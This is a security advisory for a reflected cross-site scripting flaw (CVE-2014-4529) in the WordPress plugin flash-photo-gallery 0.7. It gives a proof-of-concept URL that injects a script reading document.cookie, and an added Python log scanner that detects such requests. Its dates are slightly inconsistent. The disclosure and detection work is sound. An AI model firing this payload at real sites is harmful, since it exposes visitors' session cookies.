wp-plugin : flash-photo-gallery

Plugin Details
Plugin Name: wp-plugin : flash-photo-gallery
Affected Version : 0.7 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/flashphotogallery/fpg_preview.php?path=path%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/
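
Detection logic for the request shown above, as an added example that is not part of the original advisory or of the plugin's code: it scans web server access-log lines for requests to `fpg_preview.php` whose `path` parameter decodes to characters that can close an HTML attribute or open a tag. The combined log format, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script name taken from the PoC URL in this advisory.
TARGET_SCRIPT = "fpg_preview.php"
# Characters that let a value break out of an HTML attribute or start a tag.
BREAKOUT = re.compile(r"""['"<>]""")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_value(log_line):
    """Return the decoded `path` value when the line is a request to the
    preview script carrying attribute-breaking characters, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/" + TARGET_SCRIPT):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "path":
            decoded = fully_decode(value)  # parse_qsl already decoded once
            if BREAKOUT.search(decoded):
                return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_path_value(line)) is not None]

# Constructed sample log lines (not real traffic); line 2 reuses the PoC request.
BASE = "/wordpress/wp-content/wp-plugs/flashphotogallery/fpg_preview.php"
SAMPLE_LOG = [
    f'203.0.113.5 - - [25/May/2014:10:00:01 +0000] "GET {BASE}?path=gallery1.xml HTTP/1.1" 200 512',
    f'203.0.113.9 - - [25/May/2014:10:00:07 +0000] "GET {BASE}?path=path%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/ HTTP/1.1" 200 540',
    f'203.0.113.9 - - [25/May/2014:10:00:09 +0000] "GET {BASE}?path=x%2527%253E HTTP/1.1" 200 530',
    '203.0.113.7 - - [25/May/2014:10:00:12 +0000] "GET /wordpress/index.php?s=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: path={value!r}")
```

Because the PoC needs no authentication, a hit in the logs can come from any client; the same character check applied when the script writes `path` into its HTML output (escaping quotes as well as angle brackets) is what removes the issue.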


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : [CVE-2014-4529]
Plugin Description :
Creates a Flash Photo Gallery like one provided in Adobe Photoshop CS2 Flash Web Photo Gallery templates.

Features include:

1. Compatible with Wordpress and Wordpress MU.
2. Create and manage multiple Flash Photo Galleries.
3. Customize galleries by specifying titles, colors, thumbnail size and a lot more options.
4. Uses the wordpress built-in media uploader (media-upload.php) to add photos to.
5. Multiple photo galleries can be added in any page or post using a simple short code.
6. Uses SWFObject (http://code.google.com/p/swfobject/) for embedding swf

Height and width of the gallery swf can be (optionally) specified using the shortcode - `[fpg id="<XMLFILE>" height="<PIXELS>" width="<PIXELS>"]`

Note: In versions prior to 2.7 Flash Photo Gallery is displayed under the Page menu. In 2.7 and later versions, it is displayed under Media.

Demo Photo Gallery: [http://webdlabs.com/projects/flash-photo-gallery/](http://webdlabs.com/projects/flash-photo-gallery/)

= Whats new in 0.7? =

Height and width of the gallery swf can be (optionally) specified using the shortcode